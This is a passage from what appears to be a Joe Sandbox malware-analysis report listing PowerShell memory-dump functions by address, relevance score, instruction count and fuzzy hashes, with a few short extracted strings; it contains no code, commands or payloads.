                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c039a981a9067b99a4208ae520e0a31342dd7d97bd1a920566ade8c3456945b
                                                                                      • Instruction ID: 05d15bb3564092ba595e99a1da2d7e2b1f1fc6c5c473a46d5298fd2ce6d120d7
                                                                                      • Opcode Fuzzy Hash: 9c039a981a9067b99a4208ae520e0a31342dd7d97bd1a920566ade8c3456945b
                                                                                      • Instruction Fuzzy Hash: 44617F77A0B69D9BEF129B6CDC790E83FA0EF11629B0902F3C4D84B0A3FD1525564681
                                                                                      Function 00007FFD9B964073 Relevance: .2, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d87305a97756b29c1152ddcacc203a74f5564c1598dcce6352dba9875a4d0605
                                                                                      • Instruction ID: 12b772ebdbd26c4638e3cd4a7a0cf454fbee7e8cdef2a5d0a00fbd84e2ea0805
                                                                                      • Opcode Fuzzy Hash: d87305a97756b29c1152ddcacc203a74f5564c1598dcce6352dba9875a4d0605
                                                                                      • Instruction Fuzzy Hash: 7F514832B1EA4A9FEBA9DA9C442167477D2EFA1210B1A40BEC05DC73E3DE14EC018341
                                                                                      Function 00007FFD9B964370 Relevance: .1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aff0bdf0be5fea841da5d32c25d3b61a49dfc24e9acd2ea394933911eda7d749
                                                                                      • Instruction ID: 8934d1c9d0b968f01c491d1b22840100ccbdd7f29016bfc04871320589fa0328
                                                                                      • Opcode Fuzzy Hash: aff0bdf0be5fea841da5d32c25d3b61a49dfc24e9acd2ea394933911eda7d749
                                                                                      • Instruction Fuzzy Hash: 66413932B1EA499FEBB9D6A85421AB477D1EF80720B0901BFD05DC72E7EA14AD018381
                                                                                      Function 00007FFD9B899738 Relevance: .1, Instructions: 140COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 11ce19c9bc131d1f526a9c5241f16a65e660df5944cdeb857c4fb57b4c5a4499
                                                                                      • Instruction ID: c6d1fb4dbc1c0b59f8d3f7af9735f65c817a18a09d76f0dfff0b94b43b6dbdb5
                                                                                      • Opcode Fuzzy Hash: 11ce19c9bc131d1f526a9c5241f16a65e660df5944cdeb857c4fb57b4c5a4499
                                                                                      • Instruction Fuzzy Hash: 66410671A0DA489FDB589F5C984A6E97BE1FB98310F00416FE459D3292DB30A946CBC2
                                                                                      Function 00007FFD9B77E384 Relevance: .1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753164706.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b77d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6dac98604200c393c98e647892625d185fe30055cc27215072674b6e28b8a1ac
                                                                                      • Instruction ID: b7bed9361be1799ef5a304e989a6b7406d7dafa4244d5be5dbacdb14d4ce4c3c
                                                                                      • Opcode Fuzzy Hash: 6dac98604200c393c98e647892625d185fe30055cc27215072674b6e28b8a1ac
                                                                                      • Instruction Fuzzy Hash: 9C41297190EBC84FE7568B2898959523FF4EF52314B1606EFD088CB1B3D625F846C792
                                                                                      Function 00007FFD9B89A47C Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aafe316e31fdb08e76280ed8858956a6c0661625db29398ed57ddbe463a22f3f
                                                                                      • Instruction ID: ae1dfb3f710950cf21532cad9298718c239646dce04d543a198f5ddc8f1756fa
                                                                                      • Opcode Fuzzy Hash: aafe316e31fdb08e76280ed8858956a6c0661625db29398ed57ddbe463a22f3f
                                                                                      • Instruction Fuzzy Hash: 9921073190C74C8FDB59DFAC984A7E97FF0EB9A321F04426BD448C3166DA74941ACB92
                                                                                      Function 00007FFD9B9640BF Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0d4eda453162ee92275c1ba9dc9b9881f0ef511e90f6ce2e7a104b26de5f49d0
                                                                                      • Instruction ID: 971a4f58a07799a6de57ae131cae8abe9547f861cc1075dceca7947755caa6c6
                                                                                      • Opcode Fuzzy Hash: 0d4eda453162ee92275c1ba9dc9b9881f0ef511e90f6ce2e7a104b26de5f49d0
                                                                                      • Instruction Fuzzy Hash: 5421C522B1EA8A9FE7B9DA98446167467D1EF61210B5B40BED05DC73F2DE14EC018341
                                                                                      Function 00007FFD9B9643BC Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753899888.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2c2e325f008ec104574b68c543d42db2ec6f5de2dbb59ce463caf7f8003152b
                                                                                      • Instruction ID: 6f8d5d57e3a8c6bcd4ad0dbefe26f8bd298a0c1ca1bc829794a62e5705487a99
                                                                                      • Opcode Fuzzy Hash: f2c2e325f008ec104574b68c543d42db2ec6f5de2dbb59ce463caf7f8003152b
                                                                                      • Instruction Fuzzy Hash: FB110632B1F5499FE7B5D7989475AB477D0EF40610B5A00BED06DC72A7DA19AD008341
                                                                                      Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9B898995 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^$M_^$M_^$M_^
                                                                                      • API String ID: 0-1397233021
                                                                                      • Opcode ID: db1b3f9d14b6bcebbdc9166f6644a3991b8b737d9a3c21389ac7e1b6c47e58c7
                                                                                      • Instruction ID: 672cfcb3d839ee4c3688ae8b42b3f8f551cb35da8b72bceff0d1fc9bcf8bfbb3
                                                                                      • Opcode Fuzzy Hash: db1b3f9d14b6bcebbdc9166f6644a3991b8b737d9a3c21389ac7e1b6c47e58c7
                                                                                      • Instruction Fuzzy Hash: CC4182A3A0F6D75FEB6A476948790957FA0EF1679470E03F7C0D58B0E3ED1829074252
                                                                                      Function 00007FFD9B898BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1753559093.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                      • API String ID: 0-622050427
                                                                                      • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                      • Instruction ID: 67c483b31486e148cdd38e4893d325e3edbe53289e8afd099b86490093a99135
                                                                                      • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                      • Instruction Fuzzy Hash: 9321C2A7708565DED30A7B7DBC189E93740CF9427878507F3E1AACB093F91860878AD0

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B9739D1 Relevance: 2.8, Strings: 1, Instructions: 1590COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1880652182.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: J_H
                                                                                      • API String ID: 0-326533465
                                                                                      • Opcode ID: d332660bea47f29ae497a47dcbb0174ae3ef2c6f73498f1cf01dc84a4916f3e1
                                                                                      • Instruction ID: 297eabcf611db571858cbf30785fe68e2bac9b36fbc2383129868b59dd7769fd
                                                                                      • Opcode Fuzzy Hash: d332660bea47f29ae497a47dcbb0174ae3ef2c6f73498f1cf01dc84a4916f3e1
                                                                                      • Instruction Fuzzy Hash: B7A22962B1F7CA1FE766976858A56B43BE1EF52210B0A01FFD08DC71E3DE18AD068351
                                                                                      Function 00007FFD9B976605 Relevance: .4, Instructions: 445COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1880652182.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 237b45ab6eef05dd9b89bff0fd0984ab83fd7d9392ef1c60f5182af5a277f638
                                                                                      • Instruction ID: 37a8e5024ea35f807cff0db96999695b518ef121d7cdf4201ab9704df96bb20f
                                                                                      • Opcode Fuzzy Hash: 237b45ab6eef05dd9b89bff0fd0984ab83fd7d9392ef1c60f5182af5a277f638
                                                                                      • Instruction Fuzzy Hash: 73D14832A1FB8E5FEB65DB6848A55B57BE0EF56310B0901FED45CCB0E3DA18A9058341
                                                                                      Function 00007FFD9B8A9750 Relevance: .1, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1879765691.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c72743125204bacab8ed82a1f6de39ca16735604d20ada90807005fda45aa23
                                                                                      • Instruction ID: 649ed7daf7b3eb5543a5ad39708458dff6f566b9853461cc5afd5d42a3935c51
                                                                                      • Opcode Fuzzy Hash: 9c72743125204bacab8ed82a1f6de39ca16735604d20ada90807005fda45aa23
                                                                                      • Instruction Fuzzy Hash: 35413A7190DB884FDB19DF5C9C0A6A87FE1FB99310F0441AFD49983292CA70B805CBD2
                                                                                      Function 00007FFD9B78EB89 Relevance: .1, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1879012671.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b78d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a41f8242df5c0e75fd4984be06602c32614473037c4ec104161f0215dd1d972
                                                                                      • Instruction ID: 5a85ee4c0c348eeb86bede16a0fcbea085c7631086f8740eb0db164fd5a4deab
                                                                                      • Opcode Fuzzy Hash: 2a41f8242df5c0e75fd4984be06602c32614473037c4ec104161f0215dd1d972
                                                                                      • Instruction Fuzzy Hash: 2B41173140EBC84FE7669B3898919623FF0EF56321B1606DFD089CB1B3D725A846C792
                                                                                      Function 00007FFD9B8AA49C Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1879765691.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 19cbcc1190362a5c4ac85e7134a200263a6aeb327a21b2ae6f1d2580cf983f96
                                                                                      • Instruction ID: 740f37d3fc87f628311d903524d62752a56fef760e8511defe3296d094be4921
                                                                                      • Opcode Fuzzy Hash: 19cbcc1190362a5c4ac85e7134a200263a6aeb327a21b2ae6f1d2580cf983f96
                                                                                      • Instruction Fuzzy Hash: E221F63190C74C4FDB59DBAC988A7E97FE0EB96321F04416BD448C3166DA74A81ACB92
                                                                                      Function 00007FFD9B9740BF Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1880652182.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eae0d81fafa2a68d72aba15a30b3d3390a97850aa26b32dbe2dd3b002624803c
                                                                                      • Instruction ID: 20a09e86194c1e0d8b600b66d9da1af1a5c8d7388105c88ffa88ff1a1c0ea60c
                                                                                      • Opcode Fuzzy Hash: eae0d81fafa2a68d72aba15a30b3d3390a97850aa26b32dbe2dd3b002624803c
                                                                                      • Instruction Fuzzy Hash: 3021C222B2E98A1FE7B9EA5844B227867C1EF71210B4A40BED05DC76B3DE24EC048341
                                                                                      Function 00007FFD9B9743BC Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1880652182.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ae3bf1bb2797144f5646698174ca3388f8e5500025f60fab9f0608816b3093f
                                                                                      • Instruction ID: 0061b0d6a38513dd54e289199eb6a72ad4de5c7c848e414c0d5e0af1669b8b19
                                                                                      • Opcode Fuzzy Hash: 0ae3bf1bb2797144f5646698174ca3388f8e5500025f60fab9f0608816b3093f
                                                                                      • Instruction Fuzzy Hash: BA110232B2F58A5FE7B4D75894B46BC77D0EF40620B5A00FED05DC72A7DA29AD008741
                                                                                      Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1879765691.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                      Function 00007FFD9B8AA0FB Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1879765691.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b13eed62f6c8973fd2bda75e266ff39ca74fa75627d5159124cd02b23af15129
                                                                                      • Instruction ID: 47f25ed03b015c90883cfab8048cfe85ff5ba9937abb97d0dbac18cc133209cc
                                                                                      • Opcode Fuzzy Hash: b13eed62f6c8973fd2bda75e266ff39ca74fa75627d5159124cd02b23af15129
                                                                                      • Instruction Fuzzy Hash: 7CF0F67660AA8C5FDB51DF2C98690E47FA0FF66201B0501ABD449C7061DA715948C7C2

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9B8A8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1879765691.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                                      • API String ID: 0-1415242001
                                                                                      • Opcode ID: 18246f1ced960f47f9313cb608ebcfae065cc244fd25530f79d916c2824cd461
                                                                                      • Instruction ID: e7c9e3fbdb16d3d3ea5212ac3ffb3de1b4bcdf25e518ceaaa350289893b59a2e
                                                                                      • Opcode Fuzzy Hash: 18246f1ced960f47f9313cb608ebcfae065cc244fd25530f79d916c2824cd461
                                                                                      • Instruction Fuzzy Hash: E72107B37045258AC30A37ADBC559ED7780DF5437834551F3E228CF153EF24A48B8A80

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B966605 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040839241.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: X7N
                                                                                      • API String ID: 0-1306954362
                                                                                      • Opcode ID: a7a2963fe2bfe72b57b996ea876b996c768fbac6bb221bf139d2e3f2fe677d64
                                                                                      • Instruction ID: d3d5ce2c4e255b02434dba38b4e6a90fba6e7260f3c0c06d7353bded4439d8c4
                                                                                      • Opcode Fuzzy Hash: a7a2963fe2bfe72b57b996ea876b996c768fbac6bb221bf139d2e3f2fe677d64
                                                                                      • Instruction Fuzzy Hash: F8D14732A1FB8E9FEB659BA858355B57BE0EF52314B0901FED44CCB0E3DA18A905C341
                                                                                      Function 00007FFD9B89644D Relevance: .7, Instructions: 661COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2138209e906efb52ca7a72ce6b980685005a702a5d8a5bf29863f8efc1d25a2f
                                                                                      • Instruction ID: c3884a8764a460687646fcbea05b1eb24b68a55f70e6ce5e5e73f868620c4504
                                                                                      • Opcode Fuzzy Hash: 2138209e906efb52ca7a72ce6b980685005a702a5d8a5bf29863f8efc1d25a2f
                                                                                      • Instruction Fuzzy Hash: 5CC19270A08A4D8FDF99DF9CC465AAD7BF1FF68340F1541AAD409D7296CA34E881CB81
                                                                                      Function 00007FFD9B964073 Relevance: .2, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040839241.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b0b5222cb5430131533410c2dc394f20a927754d45bc36d2225c9fcbad9dccba
                                                                                      • Instruction ID: 9160541f40c79f8c94b5e807f599660b651ba269be0ec5e1089aef4b38c0687c
                                                                                      • Opcode Fuzzy Hash: b0b5222cb5430131533410c2dc394f20a927754d45bc36d2225c9fcbad9dccba
                                                                                      • Instruction Fuzzy Hash: 3D513933B1EA8A9FEBA9DA9C542267477D1EFA5210B1A40BEC15DC72E3DE14EC058341
                                                                                      Function 00007FFD9B964370 Relevance: .1, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040839241.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dce2791ad66c2e850475538868862f0e96e12b4c290e9b03e7d5873a8111f7a5
                                                                                      • Instruction ID: 14de7d0624a4c6c936f57edc89a7e264be7a878081ad6cbc40cc701c1cdeed19
                                                                                      • Opcode Fuzzy Hash: dce2791ad66c2e850475538868862f0e96e12b4c290e9b03e7d5873a8111f7a5
                                                                                      • Instruction Fuzzy Hash: F4413A32B1EA499FEBB9D6AC5421AB477D1EF84720B4901BFD05DC72E7EA14ED018381
                                                                                      Function 00007FFD9B899728 Relevance: .1, Instructions: 144COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e3aa346390098192d078b0dc9a8605dab39bf41b03467eb45ab9144fe5543a0c
                                                                                      • Instruction ID: 7bb8abd3ba8cb67207faae3074c8f0826197c62c6d35ba5fc0d16815bc6c4329
                                                                                      • Opcode Fuzzy Hash: e3aa346390098192d078b0dc9a8605dab39bf41b03467eb45ab9144fe5543a0c
                                                                                      • Instruction Fuzzy Hash: C1412A71A0DB889FDB189F5C984A6B97BE0FB99310F54416FE45CC3292DA30A946C7C2
                                                                                      Function 00007FFD9B77E620 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2039195523.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b77d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d4b0914d9c2d0d62c8be9ee23c764db02b614cac1f86190c130ee4f0bec8fcfd
                                                                                      • Instruction ID: 6f8cc9cf40944b2e01e9cf58a669955031a68733e90f9e57fee7589923281574
                                                                                      • Opcode Fuzzy Hash: d4b0914d9c2d0d62c8be9ee23c764db02b614cac1f86190c130ee4f0bec8fcfd
                                                                                      • Instruction Fuzzy Hash: 5641157140EBC44FE756CB39D8959523FF0EF52224B1A06DFD089CB1A3D625A846C7A2
                                                                                      Function 00007FFD9B89A71C Relevance: .1, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98d05555215e800404d4c2e65e77ba8138072da31dcfef08a9990a2a0fde34ec
                                                                                      • Instruction ID: 5697440d261a8f46311d8c4e111ed095dcefe7914526d5530614d9afcdf4f8f0
                                                                                      • Opcode Fuzzy Hash: 98d05555215e800404d4c2e65e77ba8138072da31dcfef08a9990a2a0fde34ec
                                                                                      • Instruction Fuzzy Hash: F731F83190DB8C9FDB59DBA8984A6E97FE0EF56320F04416FD089C7162DA74580ACB51
                                                                                      Function 00007FFD9B89A030 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: abe62f876c907b5af29eec0647a68af4ac33f29e894dca7de240c20684f7bdb8
                                                                                      • Instruction ID: d9f6b687e1538f9b9fb3ca8710ee17cc56cf583dcb4952ed930c56c2f38f653f
                                                                                      • Opcode Fuzzy Hash: abe62f876c907b5af29eec0647a68af4ac33f29e894dca7de240c20684f7bdb8
